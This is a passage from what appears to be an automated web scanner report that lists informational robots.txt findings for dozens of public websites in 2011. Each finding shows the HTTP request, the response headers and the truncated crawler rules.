Last-Modified: Sun, 27 Feb 2011 23:32:12 GMT
ETag: "1cb-23-4d6adefc"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /
30.412. http://www.thefordstory.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefordstory.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thefordstory.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.thefordstory.com/xmlrpc.php
Content-Length: 24
Content-Type: text/plain; charset=utf-8
Date: Sun, 01 May 2011 23:53:30 GMT
Connection: close

User-agent: *
Disallow:
30.413. http://www.thehothits.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehothits.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thehothits.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:26:10 GMT
Server: Apache/2.2.9 (Ubuntu) Resin/3.1.3
Last-Modified: Thu, 28 Apr 2011 00:15:50 GMT
Accept-Ranges: bytes
Content-Length: 23
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
30.414. http://www.thehunsearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehunsearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thehunsearch.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:29:20 GMT
Server: Apache
Last-Modified: Fri, 17 Sep 2010 11:09:31 GMT
ETag: "820005-32-4907298cbb0c0"
Accept-Ranges: bytes
Content-Length: 50
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /go.php
Disallow: /out.php
30.415. http://www.theteachersguide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theteachersguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theteachersguide.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:17:59 GMT
Server: Apache/1.3.27 (Unix) mod_perl/1.27 PHP/4.2.3 mod_fastcgi/2.2.12 FrontPage/5.0.2.2510 mod_jk/1.2.0 mod_ssl/2.8.11 OpenSSL/0.9.6g
Last-Modified: Sat, 16 Jan 2010 04:04:01 GMT
ETag: "9fd7e4-31-4b513ab1"
Accept-Ranges: bytes
Content-Length: 49
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

30.416. http://www.ticketluck.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketluck.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ticketluck.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:05:20 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Content-Length: 301
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 00:05:20 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Sitemap: http://www.ticketluck.com/all_sitemaps.xml
Sitemap: http://www.ticketluck.com/uk/all_sitemaps.xml
Disallow: /images/
Disallow: /contents/
Disallow: /Images-For-cities/
Dis
...[SNIP]...
30.417. http://www.timezoneconverter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timezoneconverter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.timezoneconverter.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:50 GMT
Server: Apache
Last-Modified: Thu, 04 Feb 1999 12:40:20 GMT
ETag: "14401d-1fc-36b99534"
Accept-Ranges: bytes
Content-Length: 508
Connection: close
Content-Type: text/plain

# robots.txt for http://www.timezoneconverter.com
# contact: webmaster@timezoneconverter.com

User-agent: *
Disallow: /_borders/
Disallow: /_fpclass/
Disallow: /_private/
Disallow: /_vti_bin/
Disallow
...[SNIP]...
30.418. http://www.tomorrowsworld.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tomorrowsworld.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tomorrowsworld.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:49:29 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 06 Sep 2010 10:37:16 GMT
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Sun, 15 May 2011 23:49:29 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
30.419. http://www.top-10-list.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.top-10-list.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.top-10-list.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Sun, 24 Apr 2011 23:35:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 01 May 2011 23:35:56 GMT
Connection: close
Content-Type: text/plain

User-agent: Googlebot
Disallow: /wp-content/
Disallow: /trackback/
Disallow: /wp-admin/
Disallow: /index.php
Disallow: /*?
Disallow: /*.php$
Disallow: /*.js$
Disallow: /*.inc$
Disallow: /*.cs
...[SNIP]...
30.420. http://www.top21sites.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.top21sites.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.top21sites.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:54:30 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: Apache=173.193.214.243.1304297670854503; path=/; expires=Wed, 01-Jun-11 00:54:30 GMT
Last-Modified: Fri, 07 Jan 2011 02:21:57 GMT
ETag: "89bb12-208c-49938484bfb40"
Accept-Ranges: bytes
Content-Length: 8332
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8


# Robots.txt file from http://www.searchengineworld.com
#
# Built from text file http://info.webcrawler.com/mak/projects/robots/active/all.txt
#
# This restricts access to only known and registere
...[SNIP]...
30.421. http://www.toyotacertified.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyotacertified.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.toyotacertified.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 22 Apr 2011 15:56:01 GMT
ETag: "7b813-dc-e4f6a640"
Accept-Ranges: bytes
Content-Length: 220
Content-Type: text/plain
Date: Sun, 01 May 2011 23:38:35 GMT
Connection: close

User-agent: *
Disallow: /bat/
Disallow: /css/
Disallow: /disclaimers/
Disallow: /help/
Disallow: /img/
Disallow: /includes/
Disallow: /js/
Disallow: /xml/
Disallow: /dealers/services/
Disall
...[SNIP]...
30.422. http://www.tqlkg.com/image-4989411-10732263  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tqlkg.com
Path:   /image-4989411-10732263

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tqlkg.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "FhzzhbeZ+32"
Last-Modified: Mon, 25 Apr 2011 22:28:50 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 37
Date: Mon, 02 May 2011 02:19:12 GMT

# go away
User-agent: *
Disallow: /
30.423. http://www.tradingplaceamerica.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingplaceamerica.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tradingplaceamerica.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:39 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Tue, 07 Jul 2009 15:47:02 GMT
ETag: "8e84b2-16-4a536df6"
Accept-Ranges: bytes
Content-Length: 22
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /
30.424. http://www.traditionalmusic.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.traditionalmusic.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.traditionalmusic.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:04:00 GMT
Server: Apache
Last-Modified: Thu, 27 May 2010 10:36:49 GMT
ETag: "bd500c1-194-48790f7c89240"
Accept-Ranges: bytes
Content-Length: 404
Connection: close
Content-Type: text/plain

#Traditional music

User-agent: Slurp
Crawl-delay: 10 0

User-agent: twiceler
Crawl-delay: 1 5

User-agent: Turnitinbot
Disallow: /

User-agent: turnitin
Disallow: /

User-agent: Mp3Bot
Disallow: /

U
...[SNIP]...
30.425. http://www.travel-library.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travel-library.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.travel-library.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 20 Oct 2010 00:07:30 GMT
ETag: "21a8d67-2cf-493013200b480"
Accept-Ranges: bytes
Content-Length: 719
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Language: en-GB

User-agent: ShopWiki
Crawl-Delay: 5

User-agent: *
Disallow: /owner/
Disallow: /search.html
Disallow: /Log.html
Disallow: /HotelPhotoSubmission.html
Disallow: /ReviewHelfulSubmission.html
Disallow: /C
...[SNIP]...
30.426. http://www.trilulilu.ro/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trilulilu.ro
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trilulilu.ro

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:45:06 GMT
Server: Apache
Last-Modified: Tue, 08 Mar 2011 11:02:32 GMT
ETag: "18cd0d2-17-49df68c86c200"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
30.427. http://www.trincoll.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trincoll.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trincoll.edu

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:20:57 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Thu, 10 Aug 2006 20:46:32 GMT
ETag: "fa800d-32-41aafec3f1a00"
Accept-Ranges: bytes
Content-Length: 50
Content-Type: text/plain; charset=ISO-8859-1
Age: 873
X-Cache: HIT from cache4.cc.trincoll.edu
X-Cache-Lookup: HIT from cache4.cc.trincoll.edu:80
Connection: close

User-agent: *
Disallow: /zines/tj/
Disallow: /tj/
30.428. http://www.truzu.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truzu.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.truzu.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:50:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Wed, 01 Dec 2010 12:24:56 GMT
ETag: "3f04d53-3a-49658649ad600"
Accept-Ranges: bytes
Content-Length: 58
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
Crawl-delay: 2
Request-rate: 1/2

30.429. http://www.tutorialized.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tutorialized.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tutorialized.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:50 GMT
Server: Apache
Last-Modified: Fri, 19 Feb 2010 21:57:56 GMT
ETag: "30e1df8-30-47ffb2d0a2100"
Accept-Ranges: bytes
Content-Length: 48
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /broken
Disallow: /rate
30.430. http://www.tva.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tva.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tva.gov

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:50:36 GMT
Server: Apache
Last-Modified: Thu, 01 Jul 2010 20:06:28 GMT
ETag: "3acc87-d9-48a590174d960"
Accept-Ranges: bytes
Content-Length: 217
Content-Type: text/plain
Set-Cookie: BIGipServerpublic_152.85.7.184.8061=1665160600.32031.0000; path=/
Expires: Tue, 03 May 2011 00:50:36 GMT
Connection: close

# Robots.txt file for http://www.tva.com
#

User-agent: *
Disallow: /theexchange/
Disallow: /customers/
Disallow: /environment/policy/
Disallow: /orgsRENAME
Disallow: /transition/
Disallow: /clips/
Di
...[SNIP]...
30.431. http://www.tvgrapevine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvgrapevine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tvgrapevine.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:12:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 13 Apr 2011 05:01:13 GMT
ETag: "75cbaf-130-4a0c5b4132e40"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...
30.432. http://www.tvmovie.de/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvmovie.de
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tvmovie.de

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:29 GMT
Server: Apache
Last-Modified: Tue, 13 Apr 2010 08:19:58 GMT
ETag: "f73fc-13f-48419ed5a2780"
Accept-Ranges: bytes
Content-Length: 319
Vary: Accept-Encoding
Keep-Alive: timeout=3, max=99
Connection: close
Content-Type: text/plain

# Massendownloader sperren
User-agent: wget
User-agent: webzip
User-agent: webmirror
User-agent: webcopy
Disallow: /

# andere Plattformen betreffende Seiten sperren
User-agent: *
Disallow: /imode
Dis
...[SNIP]...
30.433. http://www.twopair.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.twopair.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.twopair.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 07 Jan 2010 21:50:48 GMT
Accept-Ranges: bytes
ETag: "0ecc478e38fca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:38:00 GMT
Connection: close
Content-Length: 241

User-agent: *
Disallow: /Umbraco/
Disallow: /CSS/
Disallow: /Bin/
Disallow: /Data/
Disallow: /Install/
Disallow: /Templates/
Disallow: /Properties/
Disallow: /umbraco_client/
Disallow: /confi
...[SNIP]...
30.434. http://www.uloric.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uloric.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uloric.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 11 Mar 2011 21:36:02 GMT
Accept-Ranges: bytes
ETag: "0d795134e0cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:09:26 GMT
Connection: close
Content-Length: 223

# Last updated: 03/10/2011

User-agent: *

Disallow: /utilities/media_player.aspx
Disallow: /utilities/privacy.aspx
Disallow: /utilities/terms.aspx
Disallow: /includes/

sitemap: http://www.u
...[SNIP]...
30.435. http://www.undisciplined-subs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.undisciplined-subs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.undisciplined-subs.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:51 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.9 mod_ssl/2.8.31 OpenSSL/0.9.8c
Last-Modified: Mon, 26 May 2008 09:01:53 GMT
ETag: "17f652f-18-483a7c81"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow:
30.436. http://www.uni.cc/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uni.cc
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uni.cc

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:56:37 GMT
Server: Apache/2.2.17 (Win32) PHP/5.2.14
Last-Modified: Thu, 27 Jan 2011 22:38:36 GMT
ETag: "600000000539d-1a-49adb9c388fe4"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
30.437. http://www.uni.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uni.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uni.edu

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:45 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 16:12:06 GMT
ETag: "c010-1c4-49f3cbd158180"
Accept-Ranges: bytes
Content-Length: 452
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /unionline/messdir/
Disallow: /profdev/traits/
Disallow: /rust/
Disallow: /icss/modelcore/
Disallow: /resources/alert/web/
Disallow: /collegeportrait/
Disallow: /mt/
Disallow:
...[SNIP]...
30.438. http://www.unlimitedgamer.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unlimitedgamer.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.unlimitedgamer.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:03 GMT
Server: Apache/1.3.42 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Cache-Control: max-age=1209600
Expires: Sun, 15 May 2011 23:39:03 GMT
Last-Modified: Thu, 28 Jun 2007 11:00:00 GMT
ETag: "21080ec-65b-468394b0"
Accept-Ranges: bytes
Content-Length: 1627
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9 2007/06/27 22:37:44 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites lik
...[SNIP]...
30.439. http://www.unrealitymag.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unrealitymag.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.unrealitymag.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:21 GMT
Server: Apache
Last-Modified: Tue, 13 Jan 2009 13:18:15 GMT
Accept-Ranges: bytes
Content-Length: 305
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-Agent: Googlebot
Disallow: /archives/
Disallow: /feed/
Disallow: /feed
Disallow: /category/
Disallow: /cgi-bin/
Disallow: /wp-admin/
Disallow: /wp-content/
Disallow: /wp-images/
Disallow
...[SNIP]...
30.440. http://www.unscramble.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unscramble.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.unscramble.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:59 GMT
Server: Apache
Last-Modified: Sun, 29 Aug 2010 18:59:14 GMT
ETag: "2c0336-18-f1a60480"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow:
30.441. http://www.usa4sale.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usa4sale.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usa4sale.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: bb2_screener_=1304292404+173.193.214.243; path=/
X-Pingback: http://blog.usa4sale.net/xmlrpc.php
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:
30.442. http://www.usahockey.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usahockey.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usahockey.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Length: 71
Content-Type: text/plain
Last-Modified: Tue, 15 Jan 2008 21:36:42 GMT
Accept-Ranges: bytes
ETag: "c58f16b8be57c81:5d2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BALANCEID=mycluster.node3; path=/;
Date: Mon, 02 May 2011 00:18:30 GMT
Connection: close

# robots.txt
User-agent: *
Crawl-delay: 120
Disallow: /cgi-bin/

30.443. http://www.usedpartscentral.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usedpartscentral.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usedpartscentral.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:26 GMT
Server: Apache
Last-Modified: Wed, 03 Dec 2008 13:32:06 GMT
ETag: "1cb8aed-96-7856c180"
Accept-Ranges: bytes
Content-Length: 150
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

# Dissallow access to /cgi-bin/
User-agent: *
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /members/
30.444. http://www.usjobsources.com/MjMwODJ8NzA2N3wxMjYwNjY3fHYy/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usjobsources.com
Path:   /MjMwODJ8NzA2N3wxMjYwNjY3fHYy/r

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usjobsources.com

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1034; path=/; expires=Tue, 03-May-2011 04:18:25 GMT
Date: Sun, 01 May 2011 23:32:54 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Aug 2010 19:04:01 GMT
ETag: "acd4f0-1a-48e31d8578a40"
Accept-Ranges: bytes
Content-Length: 26
P3P: CP="IDC DSP COR CURa ADMa DEVa PSAa PSDa CONi TELi OUR DELa BUS IND PHY UNI PUR COM NAV INT DEM"
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /
30.445. http://www.vhlcentral.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vhlcentral.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vhlcentral.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:26 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 26 Apr 2011 13:36:36 GMT
ETag: "9685f5-cc-4a1d269bc6100"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/plain; charset=UTF-8

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...
30.446. http://www.villagehatshop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.villagehatshop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.villagehatshop.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:46 GMT
Server: Apache
Last-Modified: Fri, 10 Sep 2010 21:11:41 GMT
Accept-Ranges: bytes
Content-Length: 273
Cache-Control: max-age=0
Expires: Sun, 01 May 2011 23:26:46 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /
Disallow: /pma/
Disallow: /docs/
Disallow: /reviews/
Disallow: /temp/
Disallow: /shopsite-images/
Disallow: /log_report/
Disallow: /log_report_old/
Disallow: /ss-graphics/
Disal
...[SNIP]...
30.447. http://www.virtual-hairstyles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtual-hairstyles.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.virtual-hairstyles.com

Response

HTTP/1.1 200 OK
Content-Length: 60
Content-Type: text/plain
Last-Modified: Mon, 22 Nov 2010 13:24:03 GMT
Accept-Ranges: bytes
ETag: "36571d88488acb1:c95b2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:03:36 GMT
Connection: close

User-agent: *
Disallow: /IncludeFiles/
Disallow: /flash/
30.448. http://www.vocal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vocal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vocal.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:34 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Mon, 16 Aug 2010 17:40:42 GMT
ETag: "10dc339-18-54daba80"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
30.449. http://www.voiceofsandiego.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.voiceofsandiego.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.voiceofsandiego.org

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2095472
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Mon, 02 May 2011 00:53:47 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0394
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: voiceofsandiego.org
X-TNCMS-Served-By: cmsapp3
Content-Length: 5595

User-agent: Googlebot
Disallow: /content/tncms/live/
Disallow: /content/tncms/ads/
Disallow: *?mode=print
Disallow: /*?print
Disallow: *?mode=comments
Disallow: /*?comments
Disallow: *?mode=sto
...[SNIP]...
30.450. http://www.walthers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walthers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
